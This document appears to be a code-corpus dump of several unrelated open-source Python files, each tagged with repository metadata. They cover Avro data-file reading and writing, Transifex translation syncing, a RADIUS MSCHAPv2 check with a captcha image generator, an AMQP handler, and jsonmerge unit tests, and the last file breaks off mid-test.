schema.AvroException.__init__(self, fail_msg)
#
# Write Path
#
class DataFileWriter(object):
@staticmethod
def generate_sync_marker():
return generate_sixteen_random_bytes()
# TODO(hammer): make 'encoder' a metadata property
def __init__(self, writer, datum_writer, writers_schema=None, codec='null'):
"""
If the schema is not present, presume we're appending.
@param writer: File-like object to write into.
"""
self._writer = writer
self._encoder = io.BinaryEncoder(writer)
self._datum_writer = datum_writer
self._buffer_writer = BytesIO()
self._buffer_encoder = io.BinaryEncoder(self._buffer_writer)
self._block_count = 0
self._meta = {}
self._header_written = False
if writers_schema is not None:
if codec not in VALID_CODECS:
raise DataFileException("Unknown codec: %r" % codec)
self._sync_marker = DataFileWriter.generate_sync_marker()
self.set_meta('avro.codec', codec)
self.set_meta('avro.schema', str(writers_schema))
self.datum_writer.writers_schema = writers_schema
else:
# open writer for reading to collect metadata
dfr = DataFileReader(writer, io.DatumReader())
# TODO(hammer): collect arbitrary metadata
# collect metadata
self._sync_marker = dfr.sync_marker
self.set_meta('avro.codec', dfr.get_meta('avro.codec'))
# get schema used to write existing file
schema_from_file = dfr.get_meta('avro.schema')
self.set_meta('avro.schema', schema_from_file)
self.datum_writer.writers_schema = schema.parse(schema_from_file)
# seek to the end of the file and prepare for writing
writer.seek(0, 2)
self._header_written = True
# read-only properties
writer = property(lambda self: self._writer)
encoder = property(lambda self: self._encoder)
datum_writer = property(lambda self: self._datum_writer)
buffer_writer = property(lambda self: self._buffer_writer)
buffer_encoder = property(lambda self: self._buffer_encoder)
sync_marker = property(lambda self: self._sync_marker)
meta = property(lambda self: self._meta)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Perform a close if there's no exception
if type is None:
self.close()
# read/write properties
def set_block_count(self, new_val):
self._block_count = new_val
block_count = property(lambda self: self._block_count, set_block_count)
# utility functions to read/write metadata entries
def get_meta(self, key):
return self._meta.get(key)
def set_meta(self, key, val):
self._meta[key] = val
def _write_header(self):
header = {'magic': MAGIC,
'meta': self.meta,
'sync': self.sync_marker}
self.datum_writer.write_data(META_SCHEMA, header, self.encoder)
self._header_written = True
# TODO(hammer): make a schema for blocks and use datum_writer
def _write_block(self):
if not self._header_written:
self._write_header()
if self.block_count > 0:
# write number of items in block
self.encoder.write_long(self.block_count)
# write block contents
uncompressed_data = self.buffer_writer.getvalue()
if self.get_meta(CODEC_KEY) == 'null':
compressed_data = uncompressed_data
compressed_data_length = len(compressed_data)
elif self.get_meta(CODEC_KEY) == 'deflate':
# The first two characters and last character are zlib
# wrappers around deflate data.
compressed_data = zlib.compress(uncompressed_data)[2:-1]
compressed_data_length = len(compressed_data)
elif self.get_meta(CODEC_KEY) == 'snappy':
compressed_data = snappy.compress(uncompressed_data)
compressed_data_length = len(compressed_data) + 4 # crc32
else:
fail_msg = '"%s" codec is not supported.' % self.get_meta(CODEC_KEY)
raise DataFileException(fail_msg)
# Write length of block
self.encoder.write_long(compressed_data_length)
# Write block
self.writer.write(compressed_data)
# Write CRC32 checksum for Snappy
if self.get_meta(CODEC_KEY) == 'snappy':
self.encoder.write_crc32(uncompressed_data)
# write sync marker
self.writer.write(self.sync_marker)
# reset buffer
self.buffer_writer.truncate(0)
self.buffer_writer.seek(0) # py3: truncate no longer changes file position
self.block_count = 0
def append(self, datum):
"""Append a datum to the file."""
self.datum_writer.write(datum, self.buffer_encoder)
self.block_count += 1
# if the data to write is larger than the sync interval, write the block
if self.buffer_writer.tell() >= SYNC_INTERVAL:
self._write_block()
def sync(self):
"""
Return the current position as a value that may be passed to
DataFileReader.seek(long). Forces the end of the current block,
emitting a synchronization marker.
"""
self._write_block()
return self.writer.tell()
def flush(self):
"""Flush the current state of the file, including metadata."""
self._write_block()
self.writer.flush()
def close(self):
"""Close the file."""
self.flush()
self.writer.close()
class DataFileReader(six.Iterator):
"""Read files written by DataFileWriter."""
# TODO(hammer): allow user to specify expected schema?
# TODO(hammer): allow user to specify the encoder
def __init__(self, reader, datum_reader):
self._reader = reader
self._raw_decoder = io.BinaryDecoder(reader)
self._datum_decoder = None # Maybe reset at every block.
self._datum_reader = datum_reader
# read the header: magic, meta, sync
self._read_header()
# ensure codec is valid
self.codec = self.get_meta('avro.codec')
if self.codec is None:
self.codec = "null"
if self.codec not in VALID_CODECS:
raise DataFileException('Unknown codec: %s.' % self.codec)
# get file length
self._file_length = self.determine_file_length()
# get ready to read
self._block_count = 0
self.datum_reader.writers_schema = schema.parse(self.get_meta(SCHEMA_KEY))
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Perform a close if there's no exception
if type is None:
self.close()
def __iter__(self):
return self
# read-only properties
reader = property(lambda self: self._reader)
raw_decoder = property(lambda self: self._raw_decoder)
datum_decoder = property(lambda self: self._datum_decoder)
datum_reader = property(lambda self: self._datum_reader)
sync_marker = property(lambda self: self._sync_marker)
meta = property(lambda self: self._meta)
file_length = property(lambda self: self._file_length)
# read/write properties
def set_block_count(self, new_val):
self._block_count = new_val
block_count = property(lambda self: self._block_count, set_block_count)
# utility functions to read/write metadata entries
def get_meta(self, key):
return self._meta.get(key)
def set_meta(self, key, val):
self._meta[key] = val
def determine_file_length(self):
"""
Get file length and leave file cursor where we found it.
"""
remember_pos = self.reader.tell()
self.reader.seek(0, 2)
file_length = self.reader.tell()
self.reader.seek(remember_pos)
return file_length
def is_EOF(self):
return self.reader.tell() == self.file_length
def _read_header(self):
# seek to the beginning of the file to get magic block
self.reader.seek(0, 0)
# read header into a dict
header = self.datum_reader.read_data(
META_SCHEMA, META_SCHEMA, self.raw_decoder)
# check magic number
if header.get('magic') != MAGIC:
fail_msg = "Not an Avro data file: %s doesn't match %s."\
% (header.get('magic'), MAGIC)
raise schema.AvroException(fail_msg)
# set metadata
self._meta = header['meta']
if six.PY3:
for key, value in self._meta.items():
self._meta[key] = value.decode('US-ASCII')
# set sync marker
self._sync_marker = header['sync']
def _read_block_header(self):
self.block_count = self.raw_decoder.read_long()
if self.codec == "null":
# Skip a long; we don't need to use the length.
self.raw_decoder.skip_long()
self._datum_decoder = self._raw_decoder
elif self.codec == 'deflate':
# Compressed data is stored as (length, data), which
# corresponds to how the "bytes" type is encoded.
data = self.raw_decoder.read_bytes()
# -15 is the log of the window size; negative indicates
# "raw" (no zlib headers) decompression. See zlib.h.
uncompressed = zlib.decompress(data, -15)
self._datum_decoder = io.BinaryDecoder(BytesIO(uncompressed))
elif self.codec == 'snappy':
# Compressed data includes a 4-byte CRC32 checksum
length = self.raw_decoder.read_long()
data = self.raw_decoder.read(length - 4)
uncompressed = snappy.decompress(data)
self._datum_decoder = io.BinaryDecoder(BytesIO(uncompressed))
self.raw_decoder.check_crc32(uncompressed);
else:
raise DataFileException("Unknown codec: %r" % self.codec)
def _skip_sync(self):
"""
Read the length of the sync marker; if it matches the sync marker,
return True. Otherwise, seek back to where we started and return False.
"""
proposed_sync_marker = self.reader.read(SYNC_SIZE)
if proposed_sync_marker != self.sync_marker:
self.reader.seek(-SYNC_SIZE, 1)
return False
else:
return True
# TODO(hammer): handle block of length zero
# TODO(hammer): clean this up with recursion
def __next__(self):
"""Return the next datum in the file."""
if self.block_count == 0:
if self.is_EOF():
raise StopIteration
elif self._skip_sync():
if self.is_EOF(): raise StopIteration
self._read_block_header()
else:
self._read_block_header()
datum = self.datum_reader.read(self.datum_decoder)
self.block_count -= 1
return datum
def close(self):
"""Close this reader."""
self.reader.close()
def generate_sixteen_random_bytes():
try:
import os
return os.urandom(16)
except:
import random
return bytearray([ random.randrange(256) for i in range(16) ])
| Yelp/avro | lang/py/src/avro/datafile.py | Python | apache-2.0 | 12,300 |
#!/usr/bin/env python
import os, sys
from polib import pofile
from config import CONFIGURATION
from extract import SOURCE_WARN
from execute import execute
TRANSIFEX_HEADER = 'Translations in this file have been downloaded from %s'
TRANSIFEX_URL = 'https://www.transifex.com/projects/p/edx-studio/'
def push():
execute('tx push -s')
def pull():
for locale in CONFIGURATION.locales:
if locale != CONFIGURATION.source_locale:
execute('tx pull -l %s' % locale)
clean_translated_locales()
def clean_translated_locales():
"""
Strips out the warning from all translated po files
about being an English source file.
"""
for locale in CONFIGURATION.locales:
if locale != CONFIGURATION.source_locale:
clean_locale(locale)
def clean_locale(locale):
"""
Strips out the warning from all of a locale's translated po files
about being an English source file.
Iterates over machine-generated files.
"""
dirname = CONFIGURATION.get_messages_dir(locale)
for filename in ('django-partial.po', 'djangojs.po', 'mako.po'):
clean_file(dirname.joinpath(filename))
def clean_file(file):
"""
Strips out the warning from a translated po file about being an English source file.
Replaces warning with a note about coming from Transifex.
"""
po = pofile(file)
if po.header.find(SOURCE_WARN) != -1:
new_header = get_new_header(po)
new = po.header.replace(SOURCE_WARN, new_header)
po.header = new
po.save()
def get_new_header(po):
team = po.metadata.get('Language-Team', None)
if not team:
return TRANSIFEX_HEADER % TRANSIFEX_URL
else:
return TRANSIFEX_HEADER % team
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception("missing argument: push or pull")
arg = sys.argv[1]
if arg == 'push':
push()
elif arg == 'pull':
pull()
else:
raise Exception("unknown argument: (%s)" % arg)
| abdoosh00/edx-rtl-final | i18n/transifex.py | Python | agpl-3.0 | 2,013 |
'''
Compatibility module for Python 2.7 and > 3.3
=============================================
'''
# pylint: disable=invalid-name
__all__ = ('PY2', 'string_types', 'queue', 'iterkeys',
'itervalues', 'iteritems', 'xrange')
import sys
try:
import queue
except ImportError:
import Queue as queue
#: True if Python 2 intepreter is used
PY2 = sys.version_info[0] == 2
#: String types that can be used for checking if a object is a string
string_types = None
text_type = None
if PY2:
# pylint: disable=undefined-variable
# built-in actually, so it is defined in globals() for py2
string_types = basestring
text_type = unicode
else:
string_types = text_type = str
if PY2:
iterkeys = lambda d: d.iterkeys()
itervalues = lambda d: d.itervalues()
iteritems = lambda d: d.iteritems()
else:
iterkeys = lambda d: iter(d.keys())
itervalues = lambda d: iter(d.values())
iteritems = lambda d: iter(d.items())
if PY2:
# pylint: disable=undefined-variable
# built-in actually, so it is defined in globals() for py2
xrange = xrange
else:
xrange = range
| KeyWeeUsr/plyer | plyer/compat.py | Python | mit | 1,120 |
#coding=utf-8
import os
import sys
sys.path.append(sys.path[0] + "/lib/")
from werkzeug.contrib.fixers import ProxyFix
import packet
from client import Client
from dictionary import Dictionary
import mschap2
from socket import gethostname
from time import time
import random
from PIL import Image, ImageDraw, ImageFont, ImageFilter
import StringIO
_letter_cases = "abcdefghjkmnpqrstuvwxy"
_upper_cases = _letter_cases.upper()
_numbers = ''.join(map(str, range(3, 10)))
init_chars = ''.join((_letter_cases, _upper_cases, _numbers))
def radius_challenge(username, password, host, secret, port, nasip, debug):
hostname = gethostname()
dict_path = sys.path[0] + "/lib/dicts/dictionary"
radius = Client(server = host, secret = secret, authport = port, dict = Dictionary(dict_path))
request = radius.CreateAuthPacket(code = packet.AccessRequest)
if debug:
print "[DEBUG] assembling packet attributes"
request["User-Name"] = username
request["NAS-IP-Address"] = nasip
request["NAS-Identifier"] = hostname
if debug:
print "[DEBUG] auth method: mscharpv2"
auth = mschap2.MSCHAP2()
authAttrs = {}
authAttrs = auth.getAuthAttrs(username, password)
for key in authAttrs.keys():
request[key] = authAttrs[key]
if debug:
print "[DEBUG] dumping request attributes..."
for key in request.keys():
print "[DEBUG]\t\t %s : %s" % (key,request[key])
tsStart = time()
try:
reply = radius.SendPacket(request)
except packet.PacketError,e:
if debug:
print e
print "CRITICAL: Timeout sending Access-Request"
return False
tsStop = time()
if debug:
print "[DEBUG] dumping reply attributes..."
for key in reply.keys():
print "[DEBUG]\t\t %s : %s" % (key,reply[key])
if reply.code == packet.AccessAccept:
print username," OK: Access-Accept in: %0.2f seconds" % (tsStop - tsStart)
return True
else:
print "CRITICAL: Access-Reject in: %0.2f seconds" % (tsStop - tsStart)
return False
_letter_cases = "abcdefghijklnmopqrstuvwxyz"
_upper_cases = _letter_cases.upper()
_numbers = ''.join(map(str, range(3, 10)))
init_chars = ''.join((_letter_cases, _upper_cases, _numbers))
FONT_FILE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'framd.ttf')
def create_validate_code(size=(150, 40),
chars=init_chars,
img_type="jpeg",
mode="RGB",
bg_color=(255, 255, 255),
fg_color=(0, 0, 255),
font_size=18,
font_type=FONT_FILE_PATH,
length=6,
draw_lines=True,
n_line=(1, 2),
draw_points=True,
point_chance=2):
"""
@todo: 生成验证码图片
@param size: 图片的大小,格式(宽,高),默认为(120, 30)
@param chars: 允许的字符集合,格式字符串
@param img_type: 图片保存的格式,默认为GIF,可选的为GIF,JPEG,TIFF,PNG
@param mode: 图片模式,默认为RGB
@param bg_color: 背景颜色,默认为白色
@param fg_color: 前景色,验证码字符颜色,默认为蓝色#0000FF
@param font_size: 验证码字体大小
@param font_type: 验证码字体,默认为 ae_AlArabiya.ttf
@param length: 验证码字符个数
@param draw_lines: 是否划干扰线
@param n_lines: 干扰线的条数范围,格式元组,默认为(1, 2),只有draw_lines为True时有效
@param draw_points: 是否画干扰点
@param point_chance: 干扰点出现的概率,大小范围[0, 100]
@return: [0]: PIL Image实例
@return: [1]: 验证码图片中的字符串
"""
width, height = size # 宽, 高
img = Image.new(mode, size, bg_color) # 创建图形
draw = ImageDraw.Draw(img) # 创建画笔
def get_chars():
"""生成给定长度的字符串,返回列表格式"""
return random.sample(chars, length)
def create_lines():
"""绘制干扰线"""
line_num = random.randint(*n_line) # 干扰线条数
for i in range(line_num):
# 起始点
begin = (random.randint(0, size[0]), random.randint(0, size[1]))
# 结束点
end = (random.randint(0, size[0]), random.randint(0, size[1]))
draw.line([begin, end], fill=(0, 0, 0))
def create_points():
"""绘制干扰点"""
chance = min(100, max(0, int(point_chance))) # 大小限制在[0, 100]
for w in range(width):
for h in range(height):
tmp = random.randint(0, 100)
if tmp > 100 - chance:
draw.point((w, h), fill=(0, 0, 0))
def create_strs():
"""绘制验证码字符"""
c_chars = get_chars()
strs = ' %s ' % ' '.join(c_chars) # 每个字符前后以空格隔开
font = ImageFont.truetype(font_type, font_size)
font_width, font_height = font.getsize(strs)
draw.text(((width - font_width) / 3, (height - font_height) / 3),
strs, font=font, fill=fg_color)
return ''.join(c_chars)
if draw_lines:
create_lines()
if draw_points:
create_points()
strs = create_strs()
# 图形扭曲参数
params = [1 - float(random.randint(1, 2)) / 100,
0,
0,
0,
1 - float(random.randint(1, 10)) / 100,
float(random.randint(1, 2)) / 500,
0.001,
float(random.randint(1, 2)) / 500
]
img = img.transform(size, Image.PERSPECTIVE, params) # 创建扭曲
img = img.filter(ImageFilter.EDGE_ENHANCE_MORE) # 滤镜,边界加强(阈值更大)
return img, strs
| shanghai-edu/radius-1xtest | app/utils.py | Python | apache-2.0 | 6,206 |
from .physics import *
from tools import *
from geo2xml import generate_mesh
from dirnames import *
from geometries import get_geo, get_pore
from scripts import * #simulation2D, simulate
import plots | mitschabaude/nanopores | nanopores/__init__.py | Python | mit | 201 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
#
"""
Device Manager amqp handler
"""
from cfgm_common.vnc_amqp import VncAmqpHandle
from db import DBBaseDM, VirtualNetworkDM, PhysicalRouterDM
class DMAmqpHandle(VncAmqpHandle):
def __init__(self, logger, reaction_map, args):
q_name_prefix = 'device_manager'
rabbitmq_cfg = {
'servers': args.rabbit_server, 'port': args.rabbit_port,
'user': args.rabbit_user, 'password': args.rabbit_password,
'vhost': args.rabbit_vhost, 'ha_mode': args.rabbit_ha_mode,
'use_ssl': args.rabbit_use_ssl,
'ssl_version': args.kombu_ssl_version,
'ssl_keyfile': args.kombu_ssl_keyfile,
'ssl_certfile': args.kombu_ssl_certfile,
'ssl_ca_certs': args.kombu_ssl_ca_certs
}
super(DMAmqpHandle, self).__init__(logger._sandesh, logger, DBBaseDM,
reaction_map, q_name_prefix, rabbitmq_cfg)
def evaluate_dependency(self):
if not self.dependency_tracker:
return
for vn_id in self.dependency_tracker.resources.get('virtual_network',
[]):
vn = VirtualNetworkDM.get(vn_id)
if vn is not None:
vn.update_instance_ip_map()
for pr_id in self.dependency_tracker.resources.get('physical_router',
[]):
pr = PhysicalRouterDM.get(pr_id)
if pr is not None:
pr.set_config_state()
pr.uve_send()
| eonpatapon/contrail-controller | src/config/device-manager/device_manager/dm_amqp.py | Python | apache-2.0 | 1,671 |
# vim:ts=4 sw=4 expandtab softtabstop=4
import unittest
import warnings
from collections import OrderedDict
import jsonmerge
import jsonmerge.strategies
from jsonmerge.exceptions import (
HeadInstanceError,
BaseInstanceError,
SchemaError
)
from jsonmerge.jsonvalue import JSONValue
import jsonschema
try:
Draft6Validator = jsonschema.validators.Draft6Validator
except AttributeError:
Draft6Validator = None
warnings.simplefilter("always")
class TestMerge(unittest.TestCase):
def test_default(self):
schema = {}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, "b")
def test_overwrite(self):
schema = {'mergeStrategy': 'overwrite'}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, "b")
def test_version(self):
schema = {'mergeStrategy': 'version'}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': "a"}, {'value': "b"}])
def test_version_does_not_duplicate(self):
# Don't record change if it didn't change
schema = {'mergeStrategy': 'version'}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': "a"}, {'value': "b"}])
def test_version_meta(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a", merge_options={
'version': {'metadata': {'uri': 'http://example.com/a'}}})
base = merger.merge(base, "b", merge_options={
'version': {'metadata': {'uri': 'http://example.com/b'}}})
self.assertEqual(base, [
{'value': "a",
'uri': 'http://example.com/a'},
{'value': "b",
'uri': 'http://example.com/b'}])
def test_version_meta_not_obj(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.merge(None, "a", merge_options={'version': {'metadata': 'foo'}})
def test_version_meta_deprecated(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
with warnings.catch_warnings(record=True) as w:
base = merger.merge(None, 'a', meta={'foo': 'bar'})
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_version_ignoredups_false(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'ignoreDups': False}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a")
base = merger.merge(base, "a")
self.assertEqual(base, [{'value': "a"}, {'value': "a"}])
def test_version_unique_false(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'unique': False}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a")
base = merger.merge(base, "a")
self.assertEqual(base, [{'value': "a"}, {'value': "a"}])
def test_version_ignoredups_true(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, "a")
base = merger.merge(base, "a")
self.assertEqual(base, [{'value': "a"}])
def test_version_last(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'limit': 1}}
base = None
base = jsonmerge.merge(base, "a", schema)
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': "b"}])
def test_version_base_not_a_list(self):
schema = {'mergeStrategy': 'version'}
base = "a"
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, "b", schema)
def test_version_base_not_a_list_of_objects(self):
schema = {'mergeStrategy': 'version'}
base = ["a"]
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, "b", schema)
def test_version_base_no_value_in_object(self):
schema = {'mergeStrategy': 'version'}
base = [{}]
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, "b", schema)
def test_version_base_empty_list(self):
schema = {'mergeStrategy': 'version'}
base = []
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, [{'value': 'b'}])
def test_append(self):
schema = {'mergeStrategy': 'append'}
base = None
base = jsonmerge.merge(base, ["a"], schema)
base = jsonmerge.merge(base, ["b"], schema)
self.assertEqual(base, ["a", "b"])
def test_append_type_error(self):
schema = {'mergeStrategy': 'append'}
base = None
with self.assertRaises(HeadInstanceError) as cm:
jsonmerge.merge(base, "a", schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_append_type_error_base(self):
schema = {'mergeStrategy': 'append'}
base = "ab"
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, ["a"], schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_merge_default(self):
schema = {}
base = None
base = jsonmerge.merge(base, {'a': "a"}, schema)
base = jsonmerge.merge(base, {'b': "b"}, schema)
self.assertEqual(base, {'a': "a", 'b': "b"})
def test_merge_empty_schema(self):
schema = {}
base = None
base = jsonmerge.merge(base, {'a': {'b': 'c'}}, schema)
self.assertEqual(base, {'a': {'b': 'c'}})
def test_merge_trivial(self):
schema = {'mergeStrategy': 'objectMerge'}
base = None
base = jsonmerge.merge(base, {'a': "a"}, schema)
base = jsonmerge.merge(base, {'b': "b"}, schema)
self.assertTrue(isinstance(base, dict))
self.assertEqual(base, {'a': "a", 'b': "b"})
def test_merge_null(self):
schema = {'mergeStrategy': 'objectMerge'}
base = {'a': 'a'}
head = {'a': None}
r = jsonmerge.merge(base, head, schema)
self.assertEqual(head, r)
def test_merge_type_error(self):
schema = {'mergeStrategy': 'objectMerge'}
base = None
with self.assertRaises(HeadInstanceError) as cm:
jsonmerge.merge(base, "a", schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_merge_type_error_base(self):
schema = {'mergeStrategy': 'objectMerge'}
base = "ab"
with self.assertRaises(BaseInstanceError) as cm:
jsonmerge.merge(base, {'foo': 1}, schema)
self.assertEqual(cm.exception.value.ref, "#")
def test_merge_overwrite(self):
schema = {'mergeStrategy': 'objectMerge'}
base = None
base = jsonmerge.merge(base, {'a': "a"}, schema)
base = jsonmerge.merge(base, {'a': "b"}, schema)
self.assertEqual(base, {'a': "b"})
def test_merge_objclass(self):
schema = {'mergeStrategy': 'objectMerge', 'mergeOptions': { 'objClass': 'OrderedDict'}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, OrderedDict([('c', "a"), ('a', "a")]))
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
base = merger.merge(base, {'a': "b"})
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
self.assertEqual(base, {'a': "b", 'c': "a"})
def test_merge_objclass2(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'a': {'mergeStrategy': 'objectMerge',
'mergeOptions': { 'objClass': 'OrderedDict'}}}}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, {'a': {'b': 'c'}, 'd': {'e': 'f'}})
self.assertIsInstance(base, dict)
self.assertIsInstance(base['a'], OrderedDict)
self.assertIsInstance(base['d'], dict)
def test_merge_objclass_bad_cls(self):
schema = {'mergeStrategy': 'objectMerge', 'mergeOptions': { 'objClass': 'foo'}}
merger = jsonmerge.Merger(schema)
base = None
with self.assertRaises(SchemaError) as cm:
merger.merge(base, OrderedDict([('c', "a"), ('a', "a")]))
self.assertEqual(cm.exception.value.ref, '#')
def test_merge_objclass_menu(self):
schema = {'mergeStrategy': 'objectMerge', 'mergeOptions': { 'objClass': 'foo'}}
class MyDict(dict):
pass
objclass_menu = {'foo': MyDict}
merger = jsonmerge.Merger(schema, objclass_menu=objclass_menu)
base = None
base = merger.merge(base, {'c': "a", 'a': "a"})
self.assertTrue(isinstance(base, MyDict))
def test_merge_objclass_def(self):
schema = {'mergeStrategy': 'objectMerge'}
merger = jsonmerge.Merger(schema, objclass_def='OrderedDict')
base = None
base = merger.merge(base, OrderedDict([('c', "a"), ('a', "a")]))
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
base = merger.merge(base, {'a': "b"})
self.assertIsInstance(base, OrderedDict)
self.assertEqual([k for k in base], ['c', 'a'])
self.assertEqual(base, {'a': "b", 'c': "a"})
def test_merge_append(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'a': {'mergeStrategy': 'append'}
}}
base = None
base = jsonmerge.merge(base, {'a': ["a"]}, schema)
base = jsonmerge.merge(base, {'a': ["b"], 'b': 'c'}, schema)
self.assertEqual(base, {'a': ["a", "b"], 'b': 'c'})
def test_merge_append_pattern(self):
schema = {'mergeStrategy': 'objectMerge',
'patternProperties': {
'a': {'mergeStrategy': 'append'}
}}
base = None
base = jsonmerge.merge(base, {'a': ["a"]}, schema)
base = jsonmerge.merge(base, {'a': ["b"], 'b': 'c'}, schema)
self.assertEqual(base, {'a': ["a", "b"], 'b': 'c'})
def test_merge_append_additional(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'b': {'mergeStrategy': 'overwrite'}
},
'additionalProperties': {
'mergeStrategy': 'append'
}}
base = None
base = jsonmerge.merge(base, {'a': ["a"]}, schema)
base = jsonmerge.merge(base, {'a': ["b"], 'b': 'c'}, schema)
self.assertEqual(base, {'a': ["a", "b"], 'b': 'c'})
def test_merge_additional_bool(self):
schema = {'additionalProperties': True}
base = {}
head = {'a': 'a'}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {'a': 'a'})
def test_example(self):
head1 = {
'buyer': {
'id': {
'name': "Test old",
},
'uri': 'Test uri old',
}
}
head2 = {
'buyer': {
'id': {
'name': "Test new"
},
'uri': 'Test uri new',
},
'award': "Award"
}
base_expect = {
'buyer': {
'id': {
'name': [
{'value': "Test old"},
{'value': "Test new"},
]
},
'uri': 'Test uri new',
},
'award': "Award"
}
schema = {
'mergeStrategy': 'objectMerge',
'properties': {
'buyer': {
'properties': {
'id': {
'properties': {
'name': {
'mergeStrategy': 'version',
}
}
},
'uri': {
'mergeStrategy': 'overwrite',
}
},
},
'award': {
'mergeStrategy': 'overwrite',
}
},
}
base = None
base = jsonmerge.merge(base, head1, schema)
base = jsonmerge.merge(base, head2, schema)
self.assertEqual(base, base_expect)
def test_internal_refs(self):
schema = {
'id': 'http://example.com/schema_1.json',
'properties': {
'a': {'$ref': "#/definitions/a"},
},
'definitions': {
"a": {
"properties": {
"b": {'mergeStrategy': 'version'},
}
},
}
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, {"a": {"b": "c"}})
base = merger.merge(base, {"a": {"b": "d"}})
self.assertEqual(base, {"a": {"b": [{"value": "c"}, {"value": "d"}]}})
def test_external_refs(self):
schema_1 = {
'id': 'http://example.com/schema_1.json',
'properties': {
'a': {'$ref': "schema_2.json#/definitions/a"},
},
}
schema_2 = {
'id': 'http://example.com/schema_2.json',
'definitions': {
"a": {
"properties": {
"b": {'mergeStrategy': 'version'},
}
},
}
}
merger = jsonmerge.Merger(schema_1)
# merge() would otherwise make a HTTP request
merger.cache_schema(schema_2)
base = None
base = merger.merge(base, {"a": {"b": "c"}})
base = merger.merge(base, {"a": {"b": "d"}})
self.assertEqual(base, {"a": {"b": [{"value": "c"}, {"value": "d"}]}})
@unittest.skipIf(Draft6Validator is None, 'jsonschema too old')
def test_external_refs_draft6(self):
schema_1 = {
'$id': 'http://example.com/schema_1.json',
'properties': {
'a': {'$ref': "schema_2.json#/definitions/a"},
},
}
schema_2 = {
'$id': 'http://example.com/schema_2.json',
'definitions': {
"a": {
"properties": {
"b": {'mergeStrategy': 'version'},
}
},
}
}
merger = jsonmerge.Merger(schema_1, validatorclass=Draft6Validator)
# merge() would otherwise make a HTTP request
merger.cache_schema(schema_2)
base = None
base = merger.merge(base, {"a": {"b": "c"}})
base = merger.merge(base, {"a": {"b": "d"}})
self.assertEqual(base, {"a": {"b": [{"value": "c"}, {"value": "d"}]}})
def test_oneof(self):
schema = {
'oneOf': [
{
'type': 'array',
'mergeStrategy': 'append'
},
{
'type': 'object'
}
]
}
merger = jsonmerge.Merger(schema)
base = [1]
base = merger.merge(base, [2])
self.assertEqual(base, [1,2])
base = {'a': 1}
base = merger.merge(base, {'b': 2})
self.assertEqual(base, {'a': 1, 'b': 2})
base = [1]
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, {'b': 2})
self.assertEqual(cm.exception.value.ref, '#')
def test_oneof_recursive(self):
# Schema to merge all arrays with "append" strategy and all objects
# with the default "objectMerge" strategy.
schema = {
"oneOf": [
{
"type": "array",
"mergeStrategy": "append"
},
{
"type": "object",
"additionalProperties": {
"$ref": "#"
}
},
{
"type": "string"
},
]
}
base = {"a": ["1"], "b": "3", "c": {"d": ["4"], "e": "f"}}
head = {"a": ["2"], "b": "4", "g": "7", "c": {"d": ["3"]}}
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, {"a": ["1", "2"], "b": "4", "g": "7", "c": {"d": ["4", "3"], "e": "f"}})
def test_oneof_overwrite_toplevel(self):
schema = {
'mergeStrategy': 'overwrite',
'oneOf': [
{
'type': 'array'
},
{
'type': 'string'
},
]
}
merger = jsonmerge.Merger(schema)
self.assertEqual(merger.merge([2, 3, 4], 'a'), 'a')
self.assertEqual(merger.merge('a', [2, 3, 4]), [2, 3, 4])
def test_oneof_multiple_validate(self):
schema = {
'oneOf': [
{
'type': 'array',
'maxItems': 3,
'mergeStrategy': 'append'
},
{
'type': 'array',
'minItems': 2,
'mergeStrategy': 'overwrite'
}
]
}
merger = jsonmerge.Merger(schema)
base = [1]
base = merger.merge(base, [2])
self.assertEqual(base, [1, 2])
base = [1, 2]
with self.assertRaises(HeadInstanceError) as cm:
base = merger.merge(base, [3, 4])
